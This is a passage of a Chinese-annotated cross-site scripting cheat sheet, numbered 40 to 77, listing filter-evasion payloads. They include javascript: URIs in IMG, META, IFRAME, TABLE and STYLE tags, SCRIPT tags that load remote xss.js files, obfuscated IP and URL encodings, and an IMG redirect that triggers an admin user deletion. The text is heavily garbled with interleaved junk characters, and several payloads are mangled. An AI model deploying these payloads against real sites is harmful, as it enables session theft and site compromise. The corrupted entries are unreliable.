8 @3 W- [9 S; E; r (40)IMG VBscript" u! O0 R: w6 a! ]
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. _8 z5 g; g- i. W. q" q9 t
5 f/ }! _4 O O. b u
(41)META链接url5 x+ R& K# \' _+ K+ q" w
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 m3 G: o& M+ l9 w
3 B$ N8 z( R4 {$ A
(42)Iframe , |; c" T% D$ y2 H n8 V/ e4 I; v% O <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>" o, g: U# ?! P7 u b
$ C: A. X/ g, i
(43)Frame% q* K* p+ H% `, v4 J0 Y
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> , D+ d" [* a: o) }: l! _ % y I! d1 L# X: u2 m; a( d# z. [ (44)Table6 ^/ Q' d1 B( O0 v9 h
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> ' y! G& u) z! {! T) K, ^$ R5 d( A" [- u. X
(45)TD . ~% X4 Z. z- _0 q <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 K' z5 P. j5 w
; {& F4 q" |" o/ I
(46)DIV background-image- @9 W3 [$ T2 }; d O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> 5 ^4 o7 T% m6 I# x* M 6 z! r) D& U. ]; `9 Z7 f7 T (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 D0 i" V$ j0 B% } O3 D- |& M& ?. L
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> ; g& F6 U. X/ T& g0 n* q9 m+ c/ ]9 P0 z b& q- u
(48)DIV expression4 | C& m7 |. l; j5 l8 ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> " j+ Y: W1 D" I, ~. B0 {$ T5 j. k* n
(49)STYLE属性分拆表达 6 c; P4 H, x8 q! z' w k <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 [. Z* J; P, c/ H
/ l( y: X( m8 r& H. _ (50)匿名STYLE(组成:开角号和一个字母开头) * z% M0 X* J% r# P* D+ }: K0 g <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 Z- {" l) C3 y* N% u
: y) b' H4 s4 b \ (51)STYLE background-image . l# z& m* Y6 s% o <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> 3 `0 W) f' }0 @" Q" g : o# s, O5 Z# o. M% y (52)IMG STYLE方式% p. T: w# h* Z3 V1 @4 s- P
exppression(alert(“XSS”))’>0 B3 C6 y, I& v: t
) N1 W6 o" J3 f' n& k; \: G7 h (53)STYLE background/ N8 Z# J4 }# x6 }: F/ `
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> 6 Y3 c. N' z' a& e* n & l* S' V/ s: K (54)BASE7 b9 e6 N7 c& Z% h2 X* T/ o+ m
<BASE HREF=”javascript:alert(‘XSS’);//”> 8 E- Y4 L5 {- N V) b3 q$ S$ r: a8 l6 b, l
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. `4 ^. n- g V4 \* l, }' W
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED> : ]# s% C0 [* `9 |9 V5 Z/ P, A; m0 O- a, q4 q
(56)在flash中使用ActionScrpt可以混进你XSS的代码: T/ c' V/ a; ?0 A# Z: B2 I
a=”get”;8 L( Q: a5 n0 z1 ?; K
b=”URL(\”"; ( S ]: t5 P# l& [: T5 v& Q7 v1 {5 Z c=”javascript:”;6 V2 R: c8 t$ N) R u: h2 @5 `
d=”alert(‘XSS’);\”)”;5 _2 q& A ?7 o2 j* M
eval_r(a+b+c+d);& O& ~% |0 M; W* q
4 h9 W6 O/ s7 G3 i. z% W- y (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 - ~- c8 G# C3 r. f0 H <HTML xmlns:xss> 9 X0 g0 N8 D4 g9 w <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! b: S6 c, F% T
<xss:xss>XSS</xss:xss>0 B2 C# p/ |8 O, D7 N% k" W7 [7 s
</HTML> ( N2 F" ?! }1 ?! p3 f- } ( R" x( z' {. F6 v/ ] (58)如果过滤了你的JS你可以在图片里添加JS代码来利用* u6 V" c2 f: H6 p% z& ^2 f) B8 R# u
<SCRIPT SRC=””></SCRIPT> & T" _3 @. \9 a+ m 3 U; U6 S. B n4 A3 }/ ? (59)IMG嵌入式命令,可执行任意命令 * _# p' g1 K, M( m <IMG SRC=”http://www.XXX.com/a.php?a=b”> * g6 C. h! o6 r) Z 1 Q8 J% k( o6 ? (60)IMG嵌入式命令(a.jpg在同服务器) " `: r) u y5 V Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 n& N5 f1 h5 v( m, s
& m' _, p, p, ^8 d
(61)绕符号过滤 " W7 y' q/ g2 p7 I2 n( F% x <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT> + J3 _) v5 C5 t5 M6 }6 @: H- k6 n' r2 {) w2 G! I3 V
(62)$ C. C3 d' E. r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 @) n4 F! h3 k; {: l
$ K" u2 t( \: f" @ s" C (63) % J, Q6 ?& F0 }7 d' \# { <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>4 \, O( c: e; c' _* \( R
6 R) q' N7 s, y& u5 ] (64)& e: m- u" p7 ^, ~2 {* P) ]3 @$ _
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> 4 Z# y# k2 V N9 {8 T, Z/ h) q ) k8 x0 n- r- `3 V) v- `- F) T (65)3 Q! D# l I! e. ~, M7 _$ `0 w) Z% g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> " ?! }1 T/ K7 P1 n. p2 R8 H; g2 H- X! V* L
(66) ' R! o; G0 d3 A2 P$ I! n <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT> 5 @! z$ ^/ M7 p4 g) E% S , j8 u0 d1 b6 o (67) * }. n, g+ u0 v$ @8 A% Q <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT> 9 o9 m( g! r' m% y6 f7 o+ c ( y' q/ X. u2 X) i1 K (68)URL绕行7 k5 p8 [1 g8 r( p0 j+ f+ N/ K
<A HREF=”http://127.0.0.1/”>XSS</A>' J% i/ h$ r$ b7 u/ Y k! z0 V
. m# W7 ~3 u; f* R3 D$ V5 w& ?
(69)URL编码) `. P9 H, Q6 d2 P) d
<A HREF=”http://3w.org”>XSS</A> ( \3 a- d1 {; U- @# V5 Y : T" S8 n @- I& r (70)IP十进制; M7 S, B' ~& I g( N# W; A
<A HREF=”http://3232235521″>XSS</A> Q8 t/ H: D1 U9 V0 C ]
+ o! g1 b1 O8 W$ I3 h1 T (71)IP十六进制 " }9 v% u b7 | <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> i3 L. S$ x6 Z* S
8 @& r9 t# P; c: j5 a; [' N$ c
(72)IP八进制 ; Y9 c- H0 ^& H <A HREF=”http://0300.0250.0000.0001″>XSS</A> 7 D5 n5 i; w1 ~0 }5 }, \$ C: t& w! ?. y& S. Y: v( i
(73)混合编码. R9 W7 @8 l+ C2 o5 x3 h, R! G% F
<A HREF=”h * U/ t1 n z4 X! Y6 ]& d tt p://6 6.000146.0×7.147/”">XSS</A>* A- X, I- C4 E5 V
& c3 w' C+ [' H0 Y. U l6 W! S9 l
(74)节省[http:]2 j/ x8 A6 {9 _, c
<A HREF=”//www.google.com/”>XSS</A>3 H! u% Q. N( u* [
" D0 w9 b) o: F (75)节省[www] / K& z6 m; A* C' b' z <A HREF=”http://google.com/”>XSS</A> 5 g$ Z: {( _3 v* x' H1 s3 Z. C0 ]# Q& P3 r- `. p7 g
(76)绝对点绝对DNS / N$ K. e$ f3 x <A HREF=”http://www.google.com./”>XSS</A> 8 _" t" _1 h: b1 W2 M+ w6 Q7 T* I% C3 B6 O8 `& x# C" B4 f
(77)javascript链接 8 j4 D7 |- {/ O9 D9 o# G, x <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>